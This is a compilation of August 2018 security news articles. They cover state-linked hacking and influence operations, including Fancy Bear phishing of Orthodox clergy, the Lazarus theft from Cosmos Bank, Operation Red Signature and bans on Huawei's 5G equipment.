The bill's sponsors include the late John McCain and Sen. Mark Warner, the Virginia Democrat who has pressed Facebook for change since the 2016 elections. Executives from Facebook, Twitter and Google are expected to testify before Warner and other members of the Senate Intelligence Committee this week.

Experts said they are uncertain of the effectiveness of Russian disinformation, complicating assessment of the threat it might now pose.

In 2016, Russian actors likely did the greatest damage by hacking and leaking emails from Hillary Clinton's campaign and Democrats' national organization, which were widely reported by the news media. But comparatively few American voters saw individual pieces of misinformation on social media, making it unlikely that it swayed votes , said Brendan Nyhan, a University of Michigan political scientist who has analyzed the scope and impact of the Russian operations.

"There's still too much simplistic thinking about all-powerful propaganda that doesn't correspond to what we know from social science about how hard it is to change people's minds. I'm more concerned about the threat of intensifying polarization and calling the legitimacy of elections into question than I am about massive swings in vote choice," he said.

Still, it is clear that Russian intelligence views its efforts as successful and their example has already stirred others, like Iran, to try similar strategies. Such efforts are bent on coloring U.S. politics even if they are not tied to a specific election, said Lee Foster, FireEye's manager of information operations analysis.

"Where do you draw the line between efforts to influence the election or an election or efforts to influence U.S. domestic politics in general?" Foster said. "We can't just think in the context of the next election. It's not like this goes away after the midterms."

Lithuanian Media Sign Pact With Govt to Counter Hackers
30.8.2018 securityweek BigBrothers

Lithuania's major online media outlets on Tuesday signed an agreement to work with the defence ministry as they try to fend off a growing barrage of cyber attacks, largely blamed on Russia.

Fears are increasing over possible meddling in elections next year in the Baltic EU and NATO state, where hackers have planted fake news stories on media organizations' websites, or crashed them altogether.

Warning that cyberattacks can sow "great chaos in society and in the state", Defence Minister Raimundas Karoblis said Tuesday that the state felt compelled to cooperate with the media to combat the attacks.

Under the agreement media groups will share information and strategies with government, while press representatives will be able to attend meetings of the National Cyber Security Council.

Lithuania's defence ministry has said attacks are becoming "more and more coordinated, complex and refined", while intelligence services say most of the hostile cyber activity can be traced back to Russia.

The national intelligence agency warned in March that "Russian hackers will likely use cyber tools to influence the upcoming elections in Lithuania in 2019", referring to upcoming presidential, local and European ballots.

Lithuanian online media outlets have crashed on numerous occasions in recent years after being subject to so-called distributed denial of service, or DDoS, attacks.

Last year hackers posted a fake news story on the site of the Baltic News Service (BNS) newswire alleging that a group of US troops in Latvia had been exposed to mustard gas.

Hackers also planted a fake news story about Karoblis coming out as being gay on the Tv3.lt news website earlier this year.

Moscow has long objected to Lithuania's drive to join western institutions after it became the first republic to break free from the crumbling Soviet Union in 1990.

Telegram Says to Cooperate in Terror Probes, Except in Russia
29.8.2018 securityweek
Social  BigBrothers

The Telegram encrypted messenger app said Tuesday said it would cooperate with investigators in terror probes when ordered by courts, except in Russia where it is locked in an ongoing battle with authorities.

The company founded by Russian Pavel Durov has refused to provide authorities in the country with a way to read its communications and was banned by a Moscow court in April as a result.

But in its updated privacy settings, Telegram said it would disclose its users' data to "the relevant authorities" elsewhere if it receives a court order to do so, although not in Russia.

"If Telegram receives a court order that confirms you're a terror suspect, we may disclose your IP address and phone number to the relevant authorities," Telegram's new privacy settings said.

"So far, this has never happened. When it does, we will include it in a semiannual transparency report," the app added.

Durov said the new privacy terms were adopted to "comply with new European laws on protecting private data."

But Durov assured his Russian users that Telegram would continue to withhold their data from security services.

"In Russia, Telegram is asked to disclose not the phone numbers or IP addresses of terrorists based on a court decision, but access to the messages of all users," he wrote on his Telegram channel.

He added that since Telegram is illegal in Russia, "we do not consider the request of Russian secret services and our confidentiality policy does not affect the situation in Russia."

Durov has long said he would reject any attempt by the country's security services to gain backdoor access to the app.

Telegram lets people exchange messages, stickers, photos and videos in groups of up to 5,000 people. It has attracted more than 200 million users since its launch by Durov and his brother Nikolai in 2013.

Russia has acted to curb internet freedoms as social media has become the main way to organise demonstrations.

Authorities stepped up the heat on popular websites after Vladimir Putin started his fourth Kremlin term in 2012, ostensibly to fight terrorism but analysts say the real motive was to muzzle Kremlin critics.

According to the independent rights group Agora, 43 people were given prison terms for internet posts in Russia in 2017.

Tech companies have had difficulty balancing the privacy of users against law enforcement, with encryption of communications adding a layer of complexity to cooperating with authorities.

One of Telegram's rival apps, Facebook-owned Whatsapp, says it complies with authorities in accordance with "applicable law".

Google Tells Toomey Hackers Tried to Infiltrate Staff Email
28.8.2018 securityweek Hacking  BigBrothers

Google has alerted U.S. Sen. Pat Toomey's office that hackers with ties to a "nation-state" sent phishing emails to old campaign email accounts, a spokesman for the Pennsylvania Republican said Friday.

Toomey's office was notified this week about the attempt to infiltrate email accounts, said spokesman Steve Kelly. He said the dormant accounts hadn't been used since the end of the 2016 campaign, and the staffers they're attached to no longer work for Toomey. The nation-state wasn't identified.

"This underscores the cybersecurity threats our government, campaigns, and elections are currently facing," he said. "It is essential that Congress impose tough penalties on any entity that undermines our institutions."

Toomey currently isn't running for office and the effort would not have affected the upcoming midterm elections.

Google told Toomey's office that the emails appeared to be exploratory, Kelly said. Based on scans for spam, phishing and malware, the emails likely did not contain malware or links to a credential-phishing site, he said.

A Google spokesman said the company wasn't commenting on the phishing attempt.

The notification is the latest by a tech company of suspected Kremlin attempts to spy on U.S. elected officials and campaigns and potentially meddle in U.S. politics.

Google's warning to Toomey comes just weeks after a Microsoft discovery led Sen. Claire McCaskill, a Missouri Democrat who is running for re-election, to reveal that state-backed Russian hackers tried unsuccessfully to infiltrate her Senate computer network last fall.

That effort recalled what U.S. prosecutors called in a July 13 indictment a concerted effort by Russian military operatives ahead of the 2016 election focused on helping to elect Republican Donald Trump to the presidency by exposing internal divisions in the Democratic Party meant to discredit his opponent, Hillary Clinton. The indictment says the Russian agents broke into Democratic national organization servers and stole and leaked damaging emails.

On Tuesday, Microsoft disclosed what it called new Russian espionage efforts targeting U.S. political groups — this time conservative Republican foes that have promoted sanctions to punish the Kremlin for military aggression against Ukraine.

The company said a group tied to the Russian government created fake websites — presumably to steal passwords or plant spyware— that appeared to spoof two American conservative organizations: the Hudson Institute and the International Republican Institute. Three other fake sites were designed to look as if they belonged to the U.S. Senate.

The Kremlin denied involvement.

North Korea-linked Hackers Stole $13.5 Million From Cosmos Bank: Report
28.8.2018 securityweek APT  BigBrothers

The North Korea-linked hacking group Lazarus is said to have stolen $13.5 million in a recent cyber-attack targeting SWIFT/ATM infrastructure of Cosmos Bank.

The attackers likely gained access to the bank’s systems via spear phishing and/or remote administration/third-party interface and used multiple attack techniques to steal funds. The theft took place between August 10 and 13, 2018, according to researchers from Securonix.

Believed to be backed by the North Korean government, the Lazarus group was said last year to be the most serious threat to banks. This year, the hackers also focused heavily on crypto-currency exchanges and have been involved in numerous attacks against such organizations.

A recent report also revealed that most malware families originating from North Korea can be linked to Lazarus via code reuse.

Now, Securonix security researchers reveal that Lazarus was behind a high-profile ATM/SWIFT banking attack involving the Cosmos Bank, a 112-year old cooperative bank in India and the second largest in the country.

As part of the incident, the hackers are believed to have leveraged a previously established foothold before compromising the bank’s internal and ATM infrastructure on August 10-11.

Likely abusing vendor ATM test software or modifying the currently deployed ATM payment switch software, they set up a malicious ATM/POS switch and hijacked the connection between the central switch and the backend/Core Banking System (CBS).

Next, they made adjustments to the target account balances to enable withdrawals and leveraged the malicious switch to authorize ATM withdrawals for over $11.5 million in tens of thousands of domestic and international transactions, using 450 cloned (non-EMV) debit cards in 28 countries.

The malicious switch was used to send fake messages to authorize the transactions and also to prevent details sent from payment switch to reach the CBS (thus, checks on card number, card status PIN, and more were never performed).

On August 13, 2018, likely following lateral movement, the threat actor abused the Cosmos Bank’s SWIFT SAA environment LSO/RSO compromise/authentication to send three international wire transfer requests to ALM Trading Limited at Hang Seng Bank in Hong Kong, amounting to around $2 million.

“The ATM/POS banking switch that was compromised in the Cosmos Bank attack is a component that typically provides hosted ATM/POS terminal support, an interface to core banking solution (CBS) or another core financial system, and connectivity to regional, national or international networks. The primary purpose of the system is to perform transaction processing and routing decisions,” Securonix explains.

By focusing on the bank’s infrastructure instead of basic card-not-present (CNP), jackpotting or blackboxing fraud, the well-planned, highly coordinated attack was able to effectively bypass bank’s layers of defense against ATM attacks.

The security firm attributes the attack to Lazarus, a group known for the use of Windows Admin Shares for Lateral Movement, the use of custom command and control (C&C) servers that mimic TLS, the use of Windows services for persistence, timestomping, and reflective DLL injection, along with other attack techniques.

Sacrilegious Spies: Russians Tried Hacking Orthodox Clergy
28.8.2018 securityweek BigBrothers

Russian Hackers Who Bedeviled 2016 U.S. Election Also Spied on Senior Orthodox Christian Figures

LONDON (AP) — The Russian hackers indicted by the U.S. special prosecutor last month have spent years trying to steal the private correspondence of some of the world's most senior Orthodox Christian figures, The Associated Press has found, illustrating the high stakes as Kiev and Moscow wrestle over the religious future of Ukraine.

The targets included top aides to Ecumenical Patriarch Bartholomew I, who often is described as the first among equals of the world's Eastern Orthodox Christian leaders.

The Istanbul-based patriarch is currently mulling whether to accept a Ukrainian bid to tear that country's church from its association with Russia, a potential split fueled by the armed conflict between Ukrainian military forces and Russia-backed separatists in eastern Ukraine.

The AP's evidence comes from a hit list of 4,700 email addresses supplied last year by Secureworks, a subsidiary of Dell Technologies.

The AP has been mining the data for months, uncovering how a group of Russian hackers widely known as Fancy Bear tried to break into the emails of U.S. Democrats , defense contractors , intelligence workers , international journalists and even American military wives . In July, as part of special counsel Robert Mueller's ongoing investigation into Russian interference in the 2016 U.S. election, a U.S. grand jury identified 12 Russian intelligence agents as being behind the group's hack-and-leak assault against Hillary Clinton's presidential campaign.

The targeting of high-profile religious figures demonstrates the wide net cast by the cyberspies.

Patriarch Bartholomew claims the exclusive right to grant a "Tomos of Autocephaly," or full ecclesiastic independence, sought by the Ukrainians. It would be a momentous step, splitting the world's largest Eastern Orthodox denomination and severely eroding the power and prestige of the Moscow Patriarchate, which has positioned itself as a leading player within the global Orthodox community.

Ukraine is lobbying hard for a religious divorce from Russia and some observers say the issue could be decided as soon as next month.

"If something like this will take place on their doorstep, it would be a huge blow to the claims of Moscow's transnational role," said Vasilios Makrides, a specialist in Orthodox Christianity at the University of Erfurt in Germany. "It's something I don't think they will accept."

The Kremlin is scrambling to help Moscow's Patriarch Kirill retain his traditional role as the head of the Ukrainian Orthodox Church and "the more they know, the better it is for them," Makrides said.

The Russian Orthodox Church said it had no information about the hacking and declined comment. Russian officials referred the AP to previous denials by the Kremlin that it has anything to do with Fancy Bear, despite a growing body of evidence to the contrary.

Ukrainian President Petro Poroshenko flew to Istanbul in April in an effort to convince the patriarch to agree to a split, which he has described as "a matter of our independence and our national security." Moscow's Patriarch Kirill is flying to Turkey later this week in a last-ditch bid to prevent it.

Hilarion Alfeyev, Kirill's representative abroad, has warned that granting the Tomos could lead to the biggest Christian schism since 1054, when Catholic and Orthodox believers parted ways.

"If such a thing happens, Orthodox unity will be buried," Alfeyev said.

The issue is an extraordinarily sensitive one for the Ecumenical Patriarchate. Reached by phone, spokesman Nikos-Giorgos Papachristou said: "I don't want to be a part of this story."

Other church officials spoke to the AP about the hacking on condition of anonymity, saying they did not have authorization to speak to the media.

Bartholomew, who is 78, does not use email, those church officials told AP. But his aides do, and the Secureworks list spells out several attempts to crack their Gmail accounts.

Among them were several senior church officials called metropolitans, who are roughly equivalent to archbishops in the Catholic tradition. Those include Bartholomew Samaras, a key confidante of the patriarch; Emmanuel Adamakis, an influential hierarch in the church; and Elpidophoros Lambriniadis, who heads a prestigious seminary on the Turkish island of Halki. All are involved in the Tomos issue; none returned recent AP messages seeking comment.

Spy games have long been a part of the Russian Orthodox world.

The Soviet Union slaughtered tens of thousands of priests in the 1930s, but the Communists later took what survived of the church and brought it under the sway of Russia's secret police, the KGB, with clerics conscripted to spy on congregants and emigres.

The nexus between Russia's intelligence and religious establishments survived the 1991 fall of the Soviet Union and the KGB's reorganization into the FSB, according to Moscow-based political analyst Dmitry Oreshkin.

"Our church leaders are connected to the FSB and their epaulettes stick out from under their habits," Oreshkin said. "They provide Vladimir Putin's policy with an ideological foundation."

That might make one target found by the AP seem curious: The Moscow Patriarch's press secretary, Alexander Volkov.

But Orthodox theologian Cyril Hovorun said he wouldn't be surprised to see a Russian group spying on targets close to home, saying, "they're probably checking him out just in case."

Volkov did not return AP emails seeking comment.

Hovorun is unusually qualified to speak on the issue. In 2012 he — like Volkov — was an official within the Moscow Patriarchate. But he resigned after someone leaked emails showing that he secretly supported independence-leaning Ukrainian clergy.

Hovorun has since been targeted by the Russian hackers, according to the data from Secureworks, which uses the name Iron Twilight to refer to the group.

Hovorun said he believes that those who published his emails six years ago weren't related to Fancy Bear, but he noted that their modus operandi — stealing messages and then publishing them selectively — was the same.

"We've known about this tactic before the hacking of the Democrats," Hovorun said, referring to the email disclosures that rocked America's 2016 presidential campaign. "This is a familiar story for us."

The Russian hackers' religious dragnet also extended to the United States and went beyond Orthodox Christians, taking in Muslims, Jews and Catholics whose activities might conceivably be of interest to the Russian government.

John Jillions, the chancellor of the Orthodox Church in America, provided the AP with a June 19, 2015, phishing email that Secureworks later confirmed was sent to him by Fancy Bear.

Fancy Bear also went after Ummah, an umbrella group for Ukrainian Muslims; the papal nuncio in Kiev; and an account associated with the Ukrainian Greek-Catholic Church, a Byzantine rite church that accepts the authority of the Vatican, the Secureworks data shows.

Also on the hit list: Yosyp Zisels, who directs Ukraine's Association of Jewish Organizations and Communities and has frequently been quoted defending his country from charges of anti-Semitism. Zisels said he had no knowledge of the attempted hacking. Vatican officials did not return messages.

Protestants were targeted too, including three prominent Quakers operating in the Moscow area.

Hovorun said Protestants were viewed with particularly intense suspicion by the Kremlin.

"There is an opinion shared by many in the Russian establishment that all those religious groups — like Quakers, evangelicals — they are connected to the American establishment," he said.

Secureworks' data shows hacking attempts on religious targets that took place in 2015 and 2016, but other material obtained by the AP suggests attempts to compromise the Ecumenical Patriarchate are ongoing.

On Oct. 16, 2017, an email purporting to come from Papachristou, who was just being appointed as spokesman, arrived in the inboxes of about a dozen Orthodox figures.

"Dear Hierarchs, Fathers, Brothers and Sisters in Christ!" it began, explaining that Papachristou was stepping into his new role as director of communications. "It's a very big joy for me to serve the Church on this position. Some suggestions on how to build up relations with the public and the press are provided in the file attached."

The file was rigged to install surveillance software on the recipients' computers.

The email's actual sender remains a mystery — independent analyses of the malicious message by Secureworks and its competitor CrowdStrike yielded nothing definitive.

Church officials told the AP they were disturbed by the hacker's command of church jargon and their inside knowledge of Papachristou's appointment.

"The one who made this is someone who knows us," one official said.

Priests and prelates don't make obvious targets for cyberespionage, but the stakes for the Kremlin are high as the decision on Tomos looms.

Granting the Ukrainian church full independence "would be that devastating to Russia," said Daniel Payne, a researcher on the board of the J.M. Dawson Institute of Church-State Studies at Baylor University in Texas.

"Kiev is Jerusalem for the Russian Orthodox people," Payne said. "That's where the sacred relics, monasteries, churches are ... it's sacred to the people, and to Russian identity."

Australia banned Huawei from 5G network due to security concerns
25.8.2018 securityaffairs BigBrothers

Chinese-owned telecommunications firm Huawei has been banned from Australia’s 5G network due to security concerns.
The Australian government considers risky the involvement of Huawei for the rolling out of next-generation 5G communication networks.

Huawei Australia defined the decision disappointing.

Huawei Australia

We have been informed by the Govt that Huawei & ZTE have been banned from providing 5G technology to Australia. This is a extremely disappointing result for consumers. Huawei is a world leader in 5G. Has safely & securely delivered wireless technology in Aust for close to 15 yrs

1:36 AM - Aug 23, 2018
899 people are talking about this
Twitter Ads info and privacy
The Chinese company has been founded by a former People’s Liberation Army official in 1987.

The US was the first country that warned of the security risks associated with the usage of the products manufactured by the Chinese telecommunications giant.

The Chinese firm denies having shared Australian customer data with the Chinese intelligence, but it is not enough for the Australian Government.

Australian authorities also banned the Chinese firm ZTE Corp.

Huawei Australia Chairman John Lord explained in June that banning one of the world’s leading 5G suppliers could impact Australia’s economic growth and productivity for generations.

The Chinese Government is concerned about the decision of the Australian Government.

“We urge the Australian government to discard ideological biases and create a level-playing filed for Chinese companies’ operations in Australia,” said Foreign Ministry spokesman Lu Kang.

In May, the Pentagon ordered retail outlets on US military bases to stop selling Huawei and ZTE products due to unacceptable security risk they pose.

The Pentagon considers the security risk posed by the adoption of the devices manufactured by the Chinese firms unacceptable, US officials believe the smartphones could be used to spy on military personnel.

“Huawei and ZTE devices may pose an unacceptable risk to the department’s personnel, information and mission,” said Pentagon spokesman Major Dave Eastburn.

“In light of this information, it was not prudent for the department’s exchanges to continue selling them.”

In February, Dan Coats, the Director of National Intelligence, along with several other top intel officials, invited Americans to avoid buying Huawei and ZTE products.

Google Blocks Accounts in 'Influence Operation' Linked to Iran
24.8.2018 securityweek BigBrothers

Google said Thursday it blocked YouTube channels and other accounts over a misinformation campaign linked to Iran, on the heels of similar moves by Facebook and Twitter.

Google said that working with the cybersecurity firm FireEye, it linked the accounts to the Islamic Republic of Iran Broadcasting as part of an effort dating to at least January 2017.

"We identified and terminated a number of accounts linked to the IRIB organization that disguised their connection to this effort," Google vice president Kent Walker said in a statement.

"Actors engaged in this type of influence operation violate our policies, and we swiftly remove such content from our services and terminate these actors' accounts."

Google became the latest online service to crack down on misinformation efforts stemming from Russia and Iran, with the apparent aim of sowing discord and confusion ahead of the November US elections.

The tech giant said it blocked 39 YouTube channels that had racked up to total of 13,466 views in the US on "relevant videos" and disabled six accounts at Blogger and 13 accounts at its Google+ social network.

"In addition to the intelligence we received from FireEye, our teams have investigated a broader range of suspicious actors linked to Iran who have engaged in this effort," Google said.

Phishing season

Google also said it has blocked state-sponsored phishing attacks in which deceptive messages were sent to users of its free email service in an effort to trick people into disclosing information such as passwords.

"In recent months, we've detected and blocked attempts by state-sponsored actors in various countries to target political campaigns, journalists, activists, and academics located around the world," Google said.

The California-based internet giant added that in the past year it has intensified defenses against "actors linked to" the Russia-backed Internet Research Agency (IRA).

Google has removed YouTube channels and a Blogger account as a result of watching to IRA activities, according to the company. A FireEye report released on Thursday detailed its findings and expressed confidence in attributing influence campaigns to Iran.

Evidence included phone numbers, website registration information, and promotion of content in synch with Iranian political interests, according to the report.

"The activity we have uncovered highlights that multiple actors continue to engage in and experiment with online, social media driven influence operations as a means of shaping political discourse," FireEye said.

"These operations extend well beyond those conducted by Russia."

Coordinated manipulation

Facebook this week revealed that it removed more than 650 pages, groups and accounts identified as "networks of accounts misleading people about what they were doing."

The accounts, some on Facebook-owned Instagram, were presented as independent news or civil society groups but were actually working in coordinated efforts, the company said.

The social network giant said some of the pages were tied to groups previously linked to Russian intelligence operations.

Separately, Twitter said it suspended 284 accounts "for engaging in coordinated manipulation," adding that "it appears many of these accounts originated from Iran."

Former Facebook security chief Alex Stamos said in a blog post Wednesday that gaping holes remain in online platforms.

Stamos, who left Facebook this month to join Stanford University, said that "the United States has broadcast to the world that it doesn't take these issues seriously...While this failure has left the US unprepared to protect the 2018 elections, there is still a chance to defend American democracy in 2020."

Microsoft last week seized websites it linked to Russian intelligence that sought to meddle in US political debate.

Australia Bans Huawei From 5G Network Over Security Concerns
24.8.2018 securityweek BigBrothers

CANBERRA, Australia (AP) — Chinese-owned telecommunications giant Huawei has been blocked from rolling out Australia's 5G network due to security concerns.

The government said Thursday that the involvement of a company "likely to be subject to extrajudicial directions from a foreign government" presented too much risk.

Several governments have been scrutinizing Huawei over its links to the Chinese government. The private Chinese company started by a former People's Liberation Army major in 1987 suffered a setback in the U.S. market in 2012 when a congressional report said it was a security risk and warned phone companies not to buy its equipment.

Huawei has said it would never hand over Australian customer data to Chinese spy agencies, but the government's statement said no combination of security controls sufficiently mitigated the risk.

Acting Home Affairs Minister Scott Morrison said the government was committed to protecting 5G networks.

The decision also affects ZTE Corp, a Chinese maker of mobile devices.

Shenzhen-based Huawei, the world's largest telecommunications equipment supplier, had been banned from bidding for contracts for Australia's broadband network in 2011.

5G networks will start commercial services in Australia next year.

Huawei Australia tweeted that the decision was "extremely disappointing." Huawei Australia Chairman John Lord had said in June that rejecting one of the world's leading 5G suppliers could impact Australia's economic growth and productivity for generations.

In Beijing, Foreign Ministry spokesman Lu Kang expressed "serious concerns" about the decision and accused the Australian government of "making up excuses to create hurdles deliberately and taking discriminative measures in this regard.

"We urge the Australian government to discard ideological biases and create a level-playing filed for Chinese companies' operations in Australia," Lu told reporters at a daily briefing.

The U.S. House Intelligence Committee previously found that Huawei and ZTE, which is partly state-owned, were tied to the Chinese government and that both companies failed to provide responsive and detailed answers about those relationships and about their U.S. operations.

Huawei denied being financed to undertake research and development for the Chinese military, but the committee said it had received internal Huawei documents showing the company provided special network services to an entity alleged to be an elite cyber-warfare unit within the People's Liberation Army.

Lord, of Huawei Australia, at the time urged Australia not to be swayed by the U.S. report, which he said was about protectionism rather than security.

Attempt to Break Into Democratic Party Voter Data Thwarted
23.8.2018 securityweek BigBrothers

An attempt to break into the Democratic National Committee’s massive voter database has been thwarted, a party official said Wednesday, two years after Russian operatives sent the party into disarray by hacking into its computers and facilitating the release of tens of thousands of emails amid the presidential election.

A web security firm using artificial intelligence uncovered the attempt. The DNC was notified Tuesday, it said. Hackers had created a fake login page to gather usernames and passwords in an effort to gain access to the Democratic Party’s voter file, a party official said. The file contains information on tens of millions of voters. The attempt was quickly thwarted by suspending the attacker’s account, and no information was compromised, the official said. The FBI was notified.

The official wasn’t authorized to speak about sensitive security information and spoke to The Associated Press on condition of anonymity.

Government and tech officials say it’s too early to know who was behind the attempt. The FBI declined to comment to the AP.

The attempt comes as Democrats gather for their summer meeting. The party’s cybersecurity has been an issue since the 2016 presidential election, when Russian hackers compromised DNC servers and publicly revealed internal communications that exploited divisions between Bernie Sanders’ and Hillary Clinton’s campaigns as the two candidates vied for the Democratic presidential nomination. Hackers also accessed the email accounts of Clinton’s campaign chairman, John Podesta, and systematically released the contents throughout the fall campaign.

It also comes a day after Microsoft announced it had uncovered similarly fraudulent websites created by Kremlin agents that spoofed two conservative outfits that are foes of Russia’s president, Vladimir Putin, presumably to trick unwitting visitors into surrendering credentials.

Bob Lord, the DNC’s chief security officer, said the attempt showed how serious the cyberthreat is and why it’s critical that state and federal officials work together on security.

“This attempt is further proof that there are constant threats as we head into midterm elections and we must remain vigilant in order to prevent future attacks,” Lord said in a statement.

He said President Donald Trump isn’t doing enough to protect American democracy. Previously, Trump mocked the DNC’s cybersecurity and cast doubt on U.S. intelligence officials’ findings that Russia was involved.

At a previously scheduled election security briefing Wednesday, Homeland Security Secretary Kirstjen Nielsen said the quick response to the attempted DNC hack showed that the system was working “and that different entities understand who to reach out to,” she said.

“Any attack on a political party or a campaign is important for us all to take seriously,” she said, emphasizing the government was doing all it could to help protect election systems ahead of the midterm elections. At stake is control of Congress, which could potentially switch from Republican to Democrat.

Amid the news, a Senate committee abruptly postponed a Wednesday vote on legislation to help states prevent against election hacking, frustrating Democrats and at least one Republican on the panel.

The vote was put off by the Senate Rules and Administration Committee after a bipartisan group of lawmakers spent months negotiating the legislation. The bill would aim to protect state election infrastructure by requiring that all states use backup paper ballots and conduct audits after elections, among other measures. It would also require DHS to immediately notify states if the federal government is aware that a state election system has been breached.

A Senate Republican aide said the vote was postponed because secretaries of state had complained about certain provisions, including the type of audits the bill would require. The aide said additional Republican support would be necessary to move the legislation out of committee. The aide was not authorized to speak about the committee’s reasoning and spoke on condition of anonymity.

Republican Sen. James Lankford of Oklahoma, one of the bill’s sponsors, said after the vote’s postponement: “Congressional inaction is unacceptable.”

The bill “will help states take necessary steps to further prepare our election infrastructure for the possibility of interference from not just Russia, but other possible adversaries like Iran or North Korea or a hacktivist group,” Lankford said.

The DNC committee attempt wasn’t mentioned at a Senate hearing on election security Wednesday, according to senators who were present.

States have been scrambling to secure their election systems since it was revealed that Russian hackers targeted election systems in at least 21 states in 2016, though the number is likely greater. There has been no indication any vote tallies were changed. Nielsen said at the briefing that states should have auditing systems in part as a safeguard so the public knows the vote tallies can be trusted.

In Tuesday’s incident, a scanning tool deployed by the San Francisco security company Lookout detected a masquerading website designed to harvest the passwords of users of the login page of NGP VAN, a technology provider used by the Democrats and other liberal-leaning political organizations, said Mike Murray, the company’s vice president of security intelligence. He said he contacted the DNC.

The tool, which leverages artificial intelligence, has been in development for a year and wasn’t tasked to scan any sites in particular but instead to identify phishing sites based on typical attributes, Murray said.

“This is the beauty of AI: It finds things that humans don’t know to look for,” he said.

He said the tool notified Lookout before the impostor page had even been populated with content. “As soon as we realized how fast it was developing, I decided to reach out to contacts that I know at the DNC.” Murray also contacted the website hosting company, Digital Ocean.

Ross Rustici, senior director for intelligence services at Cybereason in Boston, said a voter database is a juicy target for anyone trying to exacerbate political divisions in the U.S. or gain insight on political opponents.

“The data housed in these types of databases would be incredibly useful both for domestic opposition research as well as for foreign intelligence and counterintelligence purposes,” he said.

Operation Red Signature – South Korean Firms victims of a supply chain attack
23.8.2018 securityaffairs BigBrothers

Supply Chain Attack Hits South Korean Firms
Security researchers from Trend Micro have uncovered a supply chain attack, tracked as Operation Red Signature, against organizations in South Korea.
The Operation Red Signature aimed at delivering a remote access Trojan (RAT) used by attackers to steal sensitive information from the victims.

Threat actors compromised update server of a remote support solutions provider, using this attack scheme hackers infected the victims with the 9002 RAT backdoor.

“Together with our colleagues at IssueMakersLab, we uncovered Operation Red Signature, an information theft-driven supply chain attack targeting organizations in South Korea. We discovered the attacks around the end of July, while the media reported the attack in South Korea on August 6.” reads the analysis published by TrendMicro.

The malicious code delivered by the attackers was signed with a valid digital certificate that was stolen, attackers also changed the configuration of the update server to deliver the malware only to organizations within a specified range of IP addresses.

According to Trend Micro, the attackers likely stole the code signing certificate in April and used it to sign the malicious update files then uploaded them on their servers.

Then the hackers compromised the server used to deliver the update and configured it to retrieve an update.zip file from the server controlled by the attackers.

Researchers observed that the 9002 RAT was also used to deliver additional payloads, such as an exploit tool for Internet Information Services (IIS) 6 WebDav (exploiting CVE-2017-7269) and an SQL database password dumper.

Hackers used the tools to steal data stored in their target’s web server and database.

supply chain attack Operation Red Signature

“The update.zip file contains an update.ini file, which has the malicious update configuration that specifies the remote support solution program to download file000.zip and file001.zip and extract them as rcview40u.dll and rcview.log to the installation folder.” continues the analysis.

“The program will then execute rcview40u.dll, signed with the stolen certificate, with Microsoft register server (regsvr32.exe). This dynamic-link library (DLL) is responsible for decrypting the encrypted rcview.log file and executing it in memory. 9002 RAT is the decrypted rcview.log payload, which connects to the command-and-control (C&C) server at 66[.]42[.]37[.]101.”

The analysis of the 9002 RAT backdoor revealed it was compiled on July 17, 2018, and the configuration files inside update.zip were created on July 18. On July 18, the remote support program’s update process started, experts noticed that the 9002 RAT used supply chain attack was set to be inactive in August.

The RAT can fetch a long list of hacking tools reported in the following table:

Here’s a list of files that 9002 RAT retrieves and delivers to the affected system:

Filename Tool Purpose
dsget.exe DsGet View active directory objects
dsquery.exe DsQuery Search for active directory objects
sharphound.exe SharpHound Collect active directory information
aio.exe All In One (AIO) Publicly available hack tool
ssms.exe SQL Password dumper Dump password from SQL database
printdat.dll RAT (PlugX variant) Remote access tool
w.exe IIS 6 WebDav Exploit Tool Exploit tool for CVE-2017-7269 (IIS 6)
Web.exe WebBrowserPassView Recover password stored by browser
smb.exe Scanner Scans the system’s Windows version and computer name
m.exe Custom Mimikatz (including 32bit / 64bit file) Verify computer password and active directory credentials
“Supply chain attacks don’t just affect users and businesses — they exploit the trust between vendors and its clients or customers. By trojanizing software/applications or manipulating the infrastructures or platforms that run them, supply chain attacks affects the integrity and security of the goods and services that organizations provide,” Trend Micro concludes.

Iran-Linked Influence Campaign Targets US, Others
22.8.2018 securityweek BigBrothers

Threat actors apparently working out of Iran have been conducting an operation whose goal is to influence the opinions of people in the United States and other countries around the world, FireEye reported on Tuesday.

This campaign, which the cybersecurity firm describes as an “influence operation,” involves a network of “inauthentic” news websites and clusters of social media accounts whose apparent purpose is to “promote political narratives in line with Iranian interests.”

The sites that FireEye calls “inauthentic” make an effort to hide their origins and affiliations, and rely on fake social media personas to promote content. This content is either original, copied from other sources, or taken from other sources and modified.Iran runs influence operation

The campaign, which has been active since at least 2017, focuses on anti-Israel, anti-Saudi, and pro-Palestine topics. The threat actor behind the operation has also distributed stories regarding U.S. policies that are favorable to Iran, including the Joint Comprehensive Plan of Action nuclear deal.

In addition to the United States, the group’s targets include the United Kingdom, Latin America and the Middle East.

FireEye researchers have found several pieces of evidence suggesting that Iran is behind the operation. This includes domains registered with email addresses associated with Iranian organizations, Twitter accounts registered with phone numbers with Iran’s +98 country code, and online personas promoting Iranian holidays.

However, the company says it’s only “moderately confident” that Iran is behind the activity, mainly due to the fact that this is an influence operation, which are meant to be deceptive.

The cybersecurity firm noted that the Iran-linked threat actor tracked as APT35, NewsBeef, Newscaster and Charming Kitten has also leveraged these types of inauthentic news sites and social media personas in its cyber espionage operations, but there is no evidence that this influence campaign has been conducted by APT35.

“The activity we have uncovered is significant and demonstrates that actors beyond Russia continue to engage in online, social media-driven influence operations as a means of shaping political discourse,” said Lee Foster, Manager of Information Operations Analysis at FireEye. “It also illustrates how the threat posed by such influence operations continues to evolve, and how similar influence tactics can be deployed irrespective of the particular political or ideological goals being pursued.”

FireEye is preparing a report containing technical details on the operation. The report will be shared on request.

Microsoft Disrupts Election-Related Domains Used by Russian Hackers
22.8.2018 securityweek BigBrothers

Microsoft on Monday announced that it took control of several domains associated with a notorious Russia-linked threat actor. The names of the domains suggest the hackers may have been using them in campaigns related to the upcoming midterm elections in the United States.

The tech giant’s Digital Crimes Unit obtained a court order to take control of six domains created by a threat group tracked as APT28, Fancy Bear, Pawn Storm, Strontium, Sednit, Tsar Team and Sofacy.

APT28, which experts believe is sponsored by Russia’s GRU intelligence agency, has been known to launch politics-focused campaigns, including ones aimed at the latest presidential elections in the United States and France. The group may now be targeting the upcoming midterm elections in the U.S.

The domains seized by Microsoft are my-iri.org, hudsonorg-my-sharepoint.com, senate.group, adfs-senate.services, adfs-senate.email and office365-onedrive.com.

The first domain appears to mimic the International Republican Institute, a non-profit that receives funding from the U.S. government to promote democracy around the world. The second domain appears to impersonate the Hudson Institute, a politically conservative non-profit think tank. The other domains mimic the website of the U.S. Senate and Microsoft’s Office 365 service.

